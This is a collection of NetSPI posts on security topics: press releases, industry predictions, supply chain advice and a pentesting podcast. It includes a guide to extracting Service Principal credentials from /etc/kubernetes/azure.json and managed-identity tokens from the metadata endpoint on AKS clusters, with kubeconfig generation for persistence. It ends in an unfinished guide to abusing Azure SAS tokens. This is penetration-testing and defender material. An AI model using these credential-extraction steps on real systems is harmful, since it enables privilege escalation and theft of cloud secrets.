Back

CMSWire: How Blockchain Is Enabling Digital Transformation

On January 31, 2022, Travis Hoyt was featured in a CMS Wire article titled, How Blockchain Is Enabling Digital Transformation. Preview the article below, or read the full article online here.

+ + +

Blockchain is not a new technology despite much of the hype about it in recent months. What is somewhat new is what’s behind the hype. It’s being driven not by the technology itself, but rather its applications and the digital workplace tools it enables.

For example, we have seen the key role that blockchain technology is playing in the enablement of Web3. But it is also playing a major role in the development of the metaverse and defining new ways to manage data, too. All of this has been facilitated by the evolution of blockchain technology itself.

The Future of Blockchain in Enterprise Businesses

The predominant focus of blockchain technology to date has been in the development and deployment of cryptocurrencies, tokens and other digital asset mediums with little impact on corporations and workplaces, said Travis Hoyt, chief technology officer at Minneapolis-based NetSPI, an information security provider.

But that is changing, Hoyt said, as companies start to look at the advantages of blockchain technology in areas of enterprise focus such as process flows, automation and simplification.

The result is that the blockchain market is expected to grow 68.4% over the next five years and become a key technology investment across the enterprise. There’s a substantial increase in hiring for blockchain-related skills, a number that is expected to continue to grow.

The innovations that stem from adoption of this technology will create unique opportunities, Hoyt said, but also come with risks that many organizations are not ready to address. Blockchain-based architectures share many similarities to traditional architectures, web applications and APIs, and the underlying infrastructure is largely the same or very similar. But the introduction of a distributed data plane, smart contracts and consensus models will have a notable impact on the threat model for those deployments.

“It is clear that blockchain technology is here to stay,” Hoyt said. “As cities start to leverage it, or as corporations and governments look at its potential of operational efficiency, the allure of immutable data and the ability to have perfect transactional recollection increases.”

Data will also become easily accessible, he added, and will be a powerful driver of innovation.

Back

How To Extract Credentials from Azure Kubernetes Service (AKS)

As more applications move to a container-based model, we are running into more instances of Azure Kubernetes Services (AKS) being used in Azure subscriptions. The service itself can be complicated and have a large attack surface area. In this post we will focus on how to extract credentials from the AKS service in Azure, using the Contributor role permissions on an AKS cluster.

While we won’t explain how Kubernetes works, we will use some common terms throughout this post. It may be helpful to have this Kubernetes glossary open in another tab for reference. Additionally, we will not cover how to collect the Kubernetes “Secrets” from the service or how to review pods/containers for sensitive information. We’ll save those topics for a future post.

What is Azure Kubernetes Service (AKS)?

In the simplest terms, the AKS service is an Azure resource that allows you to run a Kubernetes cluster in Azure. When created, the AKS cluster resource consists of sub-resources (in a special resource group) that support running the cluster. These sub-resources, and attached cluster, allow you to orchestrate containers and set up Kubernetes workloads. As a part of the orchestration process, the cluster needs to be assigned an identity (a Service Principal or a Managed Identity) in the Azure tenant. 

Service Principal versus Managed Identity

When provisioning an AKS cluster, you will have to choose between authenticating with a Service Principal or a System-assigned Managed Identity. By default, the Service Principal that is assigned to the cluster will get the ACRPull role assigned at the subscription scope level. While it’s not a guarantee, by using an existing Service Principal, the attached identity may also have additional roles already assigned in the Azure tenant.

In contrast, a newly created System-assigned Managed Identity on an AKS cluster will not have any assigned roles in a subscription. To further complicate things, the “System-assigned” Managed Identity is actually a “User-assigned” Managed Identity that’s created in the new Resource Group for the Virtual Machine Scale Set (VMSS) cluster resources. There’s no “Identity” menu in the AKS portal blade, so it’s my understanding that the User-assigned Managed Identity is what gets used in the cluster. Each of these authentication methods have their benefits, and we will have different approaches to attacking each one.

Cluster Infrastructure

In order to access the credentials (Service Principal or Managed Identity) associated with the cluster, we will need to execute commands on the cluster. This can be done by using an authenticated kubectl session (which we will explore in the Gathering kubectl Credentials section), or by executing commands directly on the VMSS instances that support the cluster. 

When a new cluster is created in AKS, a new resource group is created in the subscription to house the supporting resources. This new resource group is named after the resource group that the AKS resource was created under, and the name of the cluster. 

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

This resource group will contain the VMSS, some supporting resources, and the Managed Identities used by the cluster.

For example, a cluster named “testCluster” that was deployed in the East US region and in the “tester” resource group would have a new resource group that was created named “MC_tester_testCluster_eastus”.

Gathering Service Principal Credentials

First, we will cover clusters that are configured with a Service Principal credential. As part of the configuration process, Azure places the Service Principal credentials in cleartext into the “/etc/kubernetes/azure.json” file on the cluster. According to the Microsoft documentation, this is by design, and is done to allow the cluster to use the Service Principal credentials. There are legitimate uses of these credentials, but it always feels wrong finding them available in cleartext.

In order to get access to the azure.json file, we will need to run a command on the cluster to “cat” out the file from the VMSS instance and return the command output.

The VMSS command execution can be done via the following options:

The Az PowerShell method is what is used in Get-AzPasswords, but you could manually use any of the above methods.

In Get-AzPasswords, this command execution is done by using a local command file (.\tempscript) that is passed into the Invoke-AzVmssVMRunCommand function. The command output is then parsed with some PowerShell and exported to the output table for the Get-AzPasswords function. 

Learn more about how to use Get-AzPasswords in my blog, Get-AzPasswords: Encrypting Automation Password Data.

Privilege Escalation Potential

There is a small issue here: Contributors on the subscription can gain access to a Service Principal credential that they are not the owner of. If the Service Principal has additional permissions, it could allow the contributor to escalate privileges.

In this example:

  • User A creates a Service Principal (AKS-SP), generates a password for it, and retains the “Owner” role on the Service Principal in Azure AD
  • User A creates the AKS cluster (Test cluster) and assigns it the Service Principal credentials
  • User B runs commands to extract credentials from the VMSS instance that runs the AKS cluster
  • User B now has cleartext credentials for a Service Principal (AKS-SP) that they do not have Owner rights on

This is illustrated in the diagram below.

Privilege Escalation Potential diagram

For all of the above, assume that both User A and B have the Contributor role on the subscription, and no additional roles assigned on the Azure AD tenant. Additionally, this attack could extend to the VM Contributor role and other roles that can run commands on VMSS instances (Microsoft.Compute/virtualMachineScaleSets/virtualMachines/runCommand/action).

Gathering Managed Identity Credentials

If the AKS cluster is configured with a Managed Identity, we will have to use the metadata service to get a token. We have previously covered this general process in the following blogs:

In this case, we will be using the VMSS command execution functionality to make a request to “https://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/”. This will return a JWT that is scoped to the management.azure.com domain.

For the AKS functionality in Get-AzPasswords, we currently have the token scoped to management.azure.com. If you would like to generate tokens for other scopes (i.e., Key Vaults), you can either modify the function in the PowerShell code or run the VMSS commands separately. Right now, this is a pending issue on the MicroBurst GitHub, so it is on the radar for future updates.

At this point we can use the token to gather information about the environment by using the Get-AzDomainInfoREST function from MicroBurst, written by Josh Magri at NetSPI. Keep in mind that the Managed Identity may not have any real roles applied, so your mileage may vary with the token usage. Given the Key Vault integrations with AKS, you may also have luck using Get-AzKeyVaultKeysREST or Get-AzKeyVaultSecretsREST from the MicroBurst tools, but you will need to request a Key Vault scoped token.

Gathering kubectl Credentials

As a final addition to the AKS section of Get-AzPasswords, we have added the functionality to generate kubeconfig files for authenticating with the kubectl tool. These config files allow for ongoing administrator access to the AKS environment, so they’re great for persistence.

Generating the config files can be complicated. The Az PowerShell module does not natively support this action, but the Az CLI and REST APIs do. Since we want to keep all the actions in Get-AzPasswords compatible with the Az PowerShell cmdlets, we ended up using a token (generated with Get-AzAccessToken) and making calls out to the REST APIs to generate the configuration. This prevents us from needing the Az CLI as an additional dependency.

Once the config files are created, you can replace your existing kubeconfig file on your testing system and you should have access to the AKS cluster. Ultimately, this will be dependent on the AKS cluster being available from your network location.

Conclusion

As a final note on these Get-AzPasswords additions, we have run all the privilege escalation scenarios past MSRC for review. They have confirmed that these issues (Cleartext Credentials, Non-Owner Credential Access, and Role/Service Boundary Crossing) are all expected behaviors of the AKS service in a subscription.

For the defenders reading this, Microsoft Security Center should have alerts for Get-AzPasswords activity, but you can specifically monitor for these indicators of compromise (IoCs) in your Azure subscription logs:

  • VMSS Command Execution
  • Issuing of Metadata tokens for Managed Identities
  • Generation of kubeconfig files

For those that want to try this on their own AKS cluster, the Get-AzPasswords function is available as part of the MicroBurst toolkit.

Need help securing your Azure cloud environment? Learn more about NetSPI’s Azure Penetration Testing services.

Back

TechRound: Cybersecurity Predictions for 2022

On January 25, 2022, Travis Hoyt, Florindo Gallicchio, Charles Horton, and Nabil Hannan were featured in TechRound’s 2022 Cybersecurity Predictions round up. Preview the article below, or read the full article online here.

  • Explore industry expert predictions on what’s in store for cybersecurity in 2022.
  • Cyber-attacks have remained a key concern throughout the COVID-19 pandemic. With 2021 now over, what does the new year have in store for cybersecurity?
  • We’ve collected predictions from industry experts, including HelpSystems’s Joe Vest, Gemserv’s Andy Green and more.

With many businesses continuing to work from home where possible and settling into a more hybrid style of work, cybersecurity has been a key concern across a range of industries.

Here, we’ve collected opinions from industry experts on what they predict 2022 has in store for cybersecurity.

Travis Hoyt, CTO at NetSPI

Attack surface management: “As organisations continue to become more reliant on SaaS technologies to enable digital transformation efforts, the security perimeter has expanded. Organisations now face a new source of cybersecurity risk as cybercriminals look to exploit misconfigurations or vulnerabilities in these SaaS technologies to wage costly attacks. In 2022, we can expect that organisations will become more focused on SaaS posture management and ensuring that their SaaS footprint is not left open as a vector for cyberattacks. This trend will be further accelerated by the insistence of insurance providers that organisations have a detailed understanding of their SaaS deployments and configurations, or face higher premiums or even a refusal of insurance altogether.”

Next generation architectures open new doors for security teams: “Interest in distributed ledger technology, or blockchain, are beginning to evolve beyond the cryptocurrency space. In 2022, we’ll begin to see the conversation shift from bitcoin to discuss the power blockchain can have within the security industry. Companies have already started using this next generation architecture, to better communicate in a secure environment within their organisations and among peers and partners. And I expect we’ll continue to see this strategy unfold as the industry grows.”

CFOs will make or break ransomware mitigation: “For too long, companies have taken a reactionary approach to ransomware attacks – opting to pay, or not pay, after the damage has already been caused. I expect to see CFOs prioritising conversations surrounding ransomware and cyber insurance within 2022 planning and budgetary meetings to develop a playbook that overalls all potential ransomware situations and a corresponding strategy to mitigate both damage and corporate spend. If they don’t lead with proactivity and continue to take a laggard approach to ransomware and cyber insurance, they are leaving their companies at risk for both a serious attack and lost corporate funds.”

Florindo Gallicchio, Managing Director and Head of Strategic Solutions at NetSPI

Cybersecurity budgets will rebound significantly from lower spend levels during the pandemic: “As we look to 2022, cybersecurity budgets will rebound significantly after a stark decrease in spending spurred by the pandemic. Ironically, while COVID-19 drove budget cuts initially, it also accelerated digital transformation efforts across industries – including automation and work-from-home infrastructure, which have both opened companies up to new security risks, leading to higher cybersecurity budget allocation in the new year. Decisions are being made in Fortune 500+ companies with CFOs on the ground, as these risk-focused enterprises understand the need for larger budgets, as well as thorough budgeted risk and compliance strategies. Smaller corporations that do not currently operate under this mindset should follow the lead of larger industry leaders to stay ahead of potential threats that emerge throughout the year.”

Charles Horton, Chief Operations Officer at NetSPI

Company culture could solve the cybersecurity hiring crisis: “It’s no secret that cybersecurity, like many industries, is facing a hiring crisis. The Great Resignation we’re seeing across the country has underscored a growing trend spurred by the COVID-19 pandemic: employees will leave their company if it cannot effectively meet their needs or fit into their lifestyle. From a retention perspective, I expect to see department heads fostering a culture that’s built on principles like performance, accountability, caring, communication, and collaboration. Once this team-based viewpoint is established, employees will take greater pride in their work, producing positive results for their teams, the company and themselves – ultimately driving positive retention rates across the organisation.”

Nabil Hannan, Managing Director at NetSPI

2022 is the year for API security: “In 2022, we will see organisations turn their attention to API security risks, deploying security solutions and conducting internal audits aimed at understanding and reducing the level of risk their current API configurations and deployments create. Over the past few years, APIs have become the cornerstone of modern software development. Organisations often leverage hundreds, and even thousands, of APIs, and ensuring they are properly configured and secured is a significant and growing challenge. Compounding this issue, cyberattackers have increasingly turned to APIs as their preferred attack vector when seeking to breach an organisation, looking for vulnerable connection points within API deployments where they can gain access to an application or network. For these reasons, securing APIs will be a top priority throughout 2022.”

The Skills Shortage Will Continue Until Hiring Practices Change: “In 2022 the cybersecurity skills gap will persist, but organisations that take a realistic approach to cybersecurity hiring and make a commitment to building cybersecurity talent from the ground up will find the most success in addressing it. The focus in closing the skills gap often relies on educating a new generation of cybersecurity professionals through universities and trade programs, and generally encouraging more interest in young professionals joining the field. In reality, though, these programs will only have limited success. The real culprit behind the skills gap is that organisations often maintain unrealistic hiring practices, with cybersecurity degrees and certification holders often finding untenable job requirements such as 3+ years of experience for an entry level job.”

Back

NetSPI Exceeds 50% Organic Revenue Growth in 2021

NetSPI reports a record-high year for growth and momentum, solidifying its role in the evolving security industry.

Minneapolis, MNNetSPI, the leader in enterprise penetration testing and attack surface management, today announced the achievement of 51% organic revenue growth in fiscal year 2021. This positions NetSPI as a competitive solution in the Penetration Testing as a Service (PTaaS) industry. Additionally, the company partnered with more than 319 new clients and welcomed 119 new employees. 

To achieve continued success in 2022, NetSPI appointed financial services industry veteran, Travis Hoyt, as Chief Technology Officer to help drive penetration testing, adversary simulation, and attack surface management product strategy. NetSPI also promoted Alex Jones to the company’s first Chief Revenue Officer, where he will continue driving strategic growth.  

“NetSPI’s 100% bookings growth in 2021 was driven by our customer-first approach to implementing meaningful security posture improvements across our client base,” said Aaron Shilts, CEO of NetSPI. “Our talented team of employees has continued to innovate by offering the highest fidelity testing results so clients can easily consume results in real-time and remediate potential threats. As we look to the new year, our team will continue to redefine penetration testing through our platform-driven, human-delivered approach and power clients with services that enable them to be prepared for any vulnerability.” 

 
Achievements that contributed to NetSPI’s success in 2021 include: 

  • $90 Million in Growth Funding: Led by KKR, with participation from Ten Eleven Ventures, the investment will be used to further accelerate NetSPI’s rapid growth. The team will prioritize expanding and investing in product innovation and deepening operations across all markets. 
  • Introduction of Risk Scoring: NetSPI added risk scoring intelligence to its Penetration Testing as a Service (PTaaS) platform to help its clients prioritize, manage, and remediate the vulnerabilities that present the greatest risk to their business. 
  • New Ransomware Attack Simulation Service: The new technology-powered service enables organizations to emulate real world ransomware to help continuously improve their ability to detect ransomware attacks. 
  • Discovery of Critical Azure Vulnerability: Practice director Karl Fosaaen discovered a critical misconfiguration in Microsoft Azure which if exploited, would allow malicious actors to escalate up to a Contributor role in the Azure Active Directory subscription. Fosaaen worked closely with the Microsoft Security Response Center (MSRC) to disclose and remediate the issue.
  • Apache Log4j Assessment: NetSPI leveraged its PTaaS platform to create a robust, targeted assessment that tests client environments for vulnerable Log4j instances. This service uses the power of NetSPI’s technology and penetration testers to find and help remediate the ubiquitous vulnerability across an organization’s attack surface.
  • IoT Penetration Testing: NetSPI added IoT penetration testing services to its existing suite of capabilities. NetSPI’s new IoT testing services focuses on identifying security flaws in ATM, automotive, operational technology, embedded, and medical devices and systems.

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

Back

NetSPI CTO Travis Hoyt Accepted into Forbes Technology Council

Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Minneapolis, MN — NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Chief Technology Officer Travis Hoyt was accepted into Forbes Technology Council, an invitation-only community for world-class CIOs, CTOs, and technology executives. 

Travis was vetted and selected by a review committee based on the depth and diversity of his experience. Criteria for acceptance include a track record of successfully impacting business growth metrics, as well as personal and professional achievements and honors.  

“We are honored to welcome Travis into the community,” said Scott Gerber, founder of Forbes Councils, the collective that includes Forbes Technology Council. “Our mission with Forbes Councils is to bring together proven leaders from every industry, creating a curated, social capital-driven network that helps every member grow professionally and make an even greater impact on the business world.” 

“It’s exciting to be considered an expert among the impressive group of security and technology leaders on the Forbes Technology Council,” said Travis. “There is a lot we can learn from one another. I’m honored to share insights from my 20+ years in the infosec industry to help others better understand how to leverage offensive security activities and ultimately reduce organizational risk.”

Visit Travis’ profile and read his first published article, Three Reasons To Include Finance And Risk Leadership In Security Testing Discussions

About NetSPI 

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ penetration testing and vulnerability management platform. Its experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn

About Forbes Councils 

Forbes Councils is a collective of invitation-only communities created in partnership with Forbes and the expert community builders who founded Young Entrepreneur Council (YEC). In Forbes Councils, exceptional business owners and leaders come together with the people and resources that can help them thrive. 

For more information about Forbes Technology Council, visit forbestechcouncil.com. To learn more about Forbes Councils, visit forbescouncils.com

Media Contacts: 
Tori Norris, NetSPI  
victoria.norris@netspi.com  
(630) 258-0277  

Amanda Echavarri, Inkhouse for NetSPI  
netspi@inkhouse.com
(978) 201-2510 

Back

Best Practices for Software Supply Chain Security

Today’s business environment extends far beyond traditional brick and mortar organizations. Due to an increased reliance on digital operations, the frequency and complexity of supply chain cyber attacks — also known as vendor risk management or third-party security — are growing exponentially. It’s apparent that business leaders can no longer ignore supply chain security.

Not only did we see an increase in supply chain attacks in 2021, but the entire anatomy of an organization’s attack surface has evolved significantly. With more organizations shifting to a remote or hybrid workforce, we’ve seen a spike in cloud adoption and a heavy reliance on digital collaboration with third-parties.

Over the past few years we’ve introduced many new risks into our software supply chains. So, how do we ensure we don’t become the next SolarWinds or Accellion? In this blog, we reveal four supply chain security best practices to get you started on solid footing.

First, understand where the threats are coming from. 

With so many facets of the supply chain connected through digital products, organizations and security leaders need to understand which sectors are most vulnerable and where hackers can find holes — both internally and externally.

A recent study found that 70% of all breaches are caused by an outside force, and 17% were specifically from malware. This is to be expected. As software developers have been outsourced more frequently, the doors have opened to traditional malware attacks and breaches. Businesses need to understand how and where their resources can be accessed, and whether these threats can be exploited. However, malicious code detection is known to be very difficult. Standard code reviews won’t always identify these risks, as they can be inserted into internally-built software and mimic the look and feel of regular code. This is one of the biggest trends leaders must be aware of and fully understand which threats could impact their organization.

In addition to malware, hackers have begun attacking multiple business assets outside of an organization’s supply chain through “island hopping.” We’re seeing 50% of today’s cyber attacks use this technique. Security leaders need to identify and monitor island hopping attacks frequently to stay ahead of the vulnerability. Gone are the days where hackers target an organization itself — instead adversaries are going after an organization’s partners to gain access to the initial organization’s network.

Supply Chain Security Best Practices

How do organizations ensure they don’t become the weakest link in the supply chain? First and foremost, be proactive! Businesses must look at internal and external factors impacting their security protocol and implement these four best practices.

1. Enforce security awareness training.

Ensure you are training your staff not only when they enter the organization, but also on a continuous basis and as new business emerges. Every staff member, regardless of level or job description, should understand the organization’s view and focus on security, including how to respond to phishing attempts and how to protect data in a remote environment. For example, in a retail environment, all internal employees and third-party partners should understand PCI compliance, while healthcare professionals need a working knowledge of HIPPA. The idea is to get everyone on the same page so they understand the importance of sensitive information within an organization and can help mediate a threat when it is presented.

2. Enact policy and standards adherence.

Adherence to policies and standards is how a business keeps progressing. But, relying on a well-written standard that matches policy is not enough. Organizations need to adhere to that policy and standards, otherwise they are meaningless. This is true when working with outside vendors as well. Generally, it’s best to set up a policy that meets an organization where it is and maps back to its business processes – a standard coherence within an organization. Once that’s understood, as a business matures, the policy must mature with it. This will create a higher level of security for your supply chain with less gaps.

In the past, we’ve spent a lot of time focusing on policies and recommendations for brick and mortar types of servers. With the new remote work and outsourcing increasing, it’s important to understand how policies transfer over when working with vendors in the new remote setting. 

3. Implement a vendor risk management program.

How we exchange information with people outside of our organization is critical in today’s environment. Cyber attacks through vendor networks are becoming more common, and organizations need to be more selective when choosing their partners.

Once partners are chosen, security teams and business leaders need to ensure all new vendors are assessed with a risk-based vendor management program. The program should address re-testing vendors according to their identified risk level. A well-established, risk-based vendor management program involves vendor training — follow this three-tiered approach to get started: 

  • Tier one: Organizations need to analyze and tier their vendors based on business risk so they can hone in on different security resources and ensure they’ve done their due diligence where it matters most. 
  • Tier two: Risk-based assessments. The higher the vendor risk, the more their security program should be accessed to understand where an organization’s supply chain could be vulnerable – organizations need to pay close attention here. Those categorized as lower risk vendors can be assessed through automated scoring, whereas medium risk vendors require a more extensive questionnaire, and high-risk vendors should showcase the level of their security program through penetration testing results. 
  • Tier three: Arguably most important for long term vendor security. Re-testing vendor assessments should be conducted at the start of a partnership, and as that partnership grows, to make sure they’re adhering to protocol. This helps confirm nothing is slipping through the cracks and that the safety policies and standards in place are constantly being met. 

4. Look at the secondary precautions. 

Once security awareness training, policy, and standards are in place, and organizations have established a successful vendor risk management program, they can look at secondary proactive measures to keep supply chain security top of mind. Tactics include, but are not limited, to attack surface management, penetration testing services, and red team exercises. These strategic offensive security activities can help identify where the security gaps exist in your software supply chain.

Now that so many organizations are working with outside vendors, third-party security is more important than ever. No company wants to fall vulnerable due to an attack that starts externally. The best way to prepare and decrease vulnerability is to have a robust security plan that the whole company understands. By implementing these four simple best practices early on, businesses can go into the new year with assurance that they won’t be the weakest link in the supply chain — and that they’re safeguarded from external supplier threats.

Want to learn more about how to strengthen your software supply chain security? Watch the on-demand webinar: "How NOT To Be The Weakest Link In The Supply Chain"
Back

SC Magazine: Small, minority-led banks and credit unions face greater cyber risk

On January 11, 2022, NetSPI CTO Travis Hoyt was featured in an article written by Karen Hoffman for SC Magazine. Read the full article online here.

+ + +

In cybersecurity, as in many areas, the “little guy” gets squeezed. Such is the apparent case with the financial industry, where small and minority-led financial services institutions (FSIs) and credit unions are feeling greater pressure and impact from online threats.

In recent months, this has grown beyond being a basic IT security, or even banking, issue into being a political one, as FSI executives and the Congress representatives who support them have made their case that smaller and emerging community-based FSIs need greater cybersecurity support from regulators, larger fellow FSIs and the core processors that typically support these small FSIs.

As Travis Hoyt, chief technology officer at NetSPI, pointed out, smaller banks, minority-led institutions, and credit unions have had an issue with cyberattacks for a number of years, oftentimes because they are unable to “attract and retain the talent needed to staff robust security teams, especially when faced with competition by larger FSIs with bigger budget allocations.”

“This challenge is exacerbated by the fact that the larger FSIs, while still a target, are more difficult to hack into than their smaller counterparts,” Hoyt added, “which entices threat actors into targeting the arguably softer, smaller targets without effective cyber control capabilities.”

Back

Strategic Penetration Testing is the Future

Cybersecurity is a moving target. As adversaries evolve, the methodologies we use to protect our businesses must evolve in tandem.  

Penetration testing is a great example of a category that must continuously innovate to keep pace with attackers. After all, the goal of penetration testing services is to emulate real-world attack tactics, techniques, and procedures (TTPs) as accurately as possible. 

Traditional penetration cannot keep pace with the realities of business agility and hacker ambitions. Without innovation and evolution, it remains slow, stodgy, inconsistent, and simply checks a compliance box. So, how do we drive the industry forward? Strategy is key, according to Manish Khera, CISO at a national utilities company. 

I recently invited Manish on the Agent of Influence podcast, a place to share best practices and trends in the world of cybersecurity and vulnerability management. We dove deep into the future of penetration testing, among other topics. When discussing the evolution of pentesting, he believes strategy is key – and I couldn’t agree more. Taking a strategic approach to security testing is vital. Continue reading to learn why, and for highlights from our conversation. 

Do you believe the security mindset has migrated to a more proactive approach today? Or do you think there’s more work that needs to happen? 

Manish: I think we have become more proactive. Is it working? Hard to say. We have created proactive programs like AppSec and the concept of shifting left for example. We talk about security assessments and consulting, and security is getting involved earlier on projects. We’re making sure that it’s not a “stage gate” pentest that occurred to assess a project. We’ve obviously grown and matured in that regard.  

So, what is the right approach? If we’re too proactive, we may miss some of the needs for last-minute reviews. A pentest before a go-live for an external facing application, for example, is a good best practice. Ideally, we have good application security processes in place early on – SAST, DAST, whatever scans, plugins, et cetera, to get a better feel of low hanging fruit. It is a tough hill to climb balancing proactive and reactive security, but we are getting better. 

Nabil: You mentioned something that resonates well with how I talk about pentesting. Ultimately, people tend to start their security practices with penetration testing as a way to discover vulnerabilities. But I think as you mature, you have to change that mindset to view pentesting as a way to determine how effective our other controls are. Keeping that in mind… 

How does penetration testing need to evolve based on the trends you’re seeing in the industry? 

Manish: I think you and I are on of one mind in this space. I do agree with you 100%, that pentesting has to evolve. The idea of it being a report card or simply finding vulnerabilities, when it should be the sum total of great activities up to that point. For future pentesting, we must do a couple different things.

Listen Now: Application Security and Penetration Testing Insights from a Utilities Sector CISO. Episode 29 of Agent of Influence with Manish Khera

Organizations should be more thoughtful about their approach. We should be willing to spend the money to threat model down to give proper avenues for pentesting vendors or your internal pentesting team. Organizations are often afraid to engage a pentesting vendor over a long period of time, and we feel we’ve spent too much money pentesting. However, we need to threat model, work with that vendor, and spend time with them to make sure they have enough time and resources to not just find vulnerabilities that are lucky to find, but also business context vulnerabilities. 

If I say “you have two weeks to get this done” that is not really a good pentest. Get that vendor in, spend a day with them, have them understand what the actual threat vectors are, understand the important parts of that application and data sets are, what the target would be from an informed, authenticated user, and so on. Then give them time to figure it out. The vendor should be smart about it too. It’s on both sides to be smart about it. It can’t be a time box, very slim budget event. It’s got to be thoughtful and threat-focused versus, “I have 50k to spend on a pentest.” 

I also think that the “shift left” marketing schemes have to come into play. We’ve got to get better integrated in using scans, using ID plugins, and teaching developers how to code better. We call this a security champions program. Have somebody from the development team join the appsec team and work with them to better understand appsec processes. Then, they go back to the development team and become champions that speak the same language as across teams. 

All of a sudden, pentesting becomes an event that clears the scorecard. If you practice good security up to that point, the vulnerabilities you find are more likely to be small efforts versus huge efforts that delay projects from going live. I hope that pentesting matures in that regard – but only time will tell.

Threat modeling can be time consuming, but valuable. Can you share a scenario where you found that threat modeling something, and then using that to drive a pentest or a security activity, was more valuable? 

Manish: The first time you do threat modeling is always the heaviest lift. Determining what framework to follow and how to create the process so that it is repeatable is most time consuming. But it does get easier over time if you follow a consistent framework. Especially if you have the same teams involved or a threat modeling champion engaged when a vendor comes in to do the threat modeling engagement.  

In terms of a key win or scenario, every time we do it, we find a better way to approach a pentest or improve our security activities. Every threat modeling assessment produces something that is shocking or surprising. I think you should always do it, because there’s always an opportunity to gain a better understanding of your applications and enable better tests. 

Essentially, coming in “blind” to do a pentest is rarely as valuable as having more details and information about how the system is architected. Taking an approach where you’re enabling your pentesters with as much detail as possible only allows you to get better results. I’m not a big fan of “black box” testing or unauthenticated testing. We should assume that an adversary has deep inside knowledge of the environment, because they likely do. They can buy it or coerce somebody to give it to them – they can get it one way or another. We have to open our eyes to that scenario. We want informed testing and we want detailed reviews. That’s how we drive value. 

For more on the future of penetration testing – plus, insights on cybersecurity challenges in the utilities sector, consultancy vs. in-house security leadership roles, how to build a security champions program, and more – listen to episode 29 of Agent of Influence, featuring Manish Khera.

Back

Azure SAS Tokens for Web Application Penetration Testers

Let’s say you’re performing a web application penetration test and you see that the site links to a URL that looks like the following:

https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/testsastokendirectory/testsastokenblob.txt?sv=2020-08-04&ss=bf&srt=co&sp=rwl&se=2021-12-13T20:00:00Z&st=2021-11-01T07:00:00Z&spr=https&sig=ns2CRdy2Ijr04sHi%2FkNoRZu6mm1B5FSJCIzS21Uka1M%3D

Following that link, you can see that the content of testsastokenblob.txt is served to you. But do you realize that you’ve also been given access to list, read, and write all the blobs in the container? Do you realize that you’ve also been given access to File service in the storage account? This blog will teach you what the above URL really is, how to understand each component, and how to identify opportunities for deeper access into an application’s cloud storage. 

TL;DR

For readers who recognize the above URL and are already familiar with the concept of Azure SAS tokens, feel free to jump to the examples section below. There are breakdowns and manipulations for the following scenarios:

  1. A user SAS with read and list permissions.
  2. An account SAS with read and list permissions for both the Blob and File services.
  3. A read-only account SAS and multiple storage containers.

If these are new concepts or you’d like a refresher on the details, continue below to learn more.

What is that URL anyway?

That URL is a shared access signature (SAS) which provides direct access to content stored in an Azure storage account. To understand its purpose, first consider a traditional web application with file uploads/downloads. This functionality needs to be built into the application itself, and all the content passes through the application on its way to the file system.

Shared access signatures provide an alternative for applications using Azure storage accounts. Rather than handling uploads/downloads within the application, the application authorizes the client to store, retrieve and manage content within the cloud storage directly. The SAS identifies the resource(s) to be accessed and includes the client’s proof of authorization.

Traditional versus Direct Cloud Storage

Breaking down the Shared Access Signature

When we come across a shared access signature on a pentest, we need to understand what access we’ve been granted. Almost all the information we need is provided in the SAS itself. But to best understand it, we’ll need to break it down and inspect each part. 

That long SAS is composed of two main parts:

  1. The Storage Resource URL:
    https://testsastokenaccount.blob.core.windows.net/testsastokencontainer/ testsastokendirectory/testsastokenblob.txt
  2. The SAS Token:
    sp=rw&st=2021-11-09T01:10:20Z&se=2021-11-09T09:10:20Z&spr=https&sv=2020-08-04&sr=b&sig=pafv%2FpEiqfIJ7Fvyia22awgqPgPx%2ByBpm1zGX%2FgOSDg%3D

We’ll take a closer look at both of those halves. Let’s start with the storage resource URL.

The Storage Resource URL

The storage resource URL identifies the content within the storage account that will be accessed. This content may be a blob, directory, container, file, queue, or table. To identify which resource we’re given access to, we can break down this URL into two parts: the domain name and the URL path.  

The Domain Name

The domain name in the storage resource URL has the following format:
<storage_account_name>.<service_id>.windows.net

Let’s look our example from earlier:
testsastokenaccount.blob.core.windows.net

We can identify that the storage account name is testsastokenaccount. While the SAS won’t provide access across storage accounts, the name itself can provide a starting place for guessing other valid storage accounts. For example, if our SAS pointed to companystorage1 or companystorage-prod, we may successfully guess that companystorage2 or companystorage-dev storage accounts exist. And if we’re truly lucky, those storage accounts may allow public access.

The domain name also identifies the storage service that the SAS provides access to. The <service_id> placeholder can have one of the following values:

  1. blobAzure Blob Storage
  2. fileAzure File Storage
  3. queueAzure Queue Storage
  4. tableAzure Table Storage

One SAS token may provide access to multiple storage services within a storage account. This means that if our SAS authorizes us to perform List operations against a container in Blob storage, we should check if we can also perform List operations against directories in File storage. 

The URL Path

